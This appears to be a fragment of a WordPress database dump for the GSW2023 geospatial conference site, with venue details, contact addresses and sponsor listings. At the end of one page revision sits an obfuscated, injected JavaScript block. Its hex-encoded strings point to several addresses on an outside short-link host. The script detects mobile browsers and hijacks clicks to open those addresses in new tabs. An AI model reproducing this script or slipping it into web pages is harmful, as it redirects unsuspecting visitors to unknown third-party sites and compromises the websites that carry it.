border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 21:38:52','2023-06-13 21:38:52','',3066,'https://gsw2023.com/?p=4685',0,'revision','',0),
(4686,1,'2023-06-13 22:22:40','2023-06-13 22:22:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" 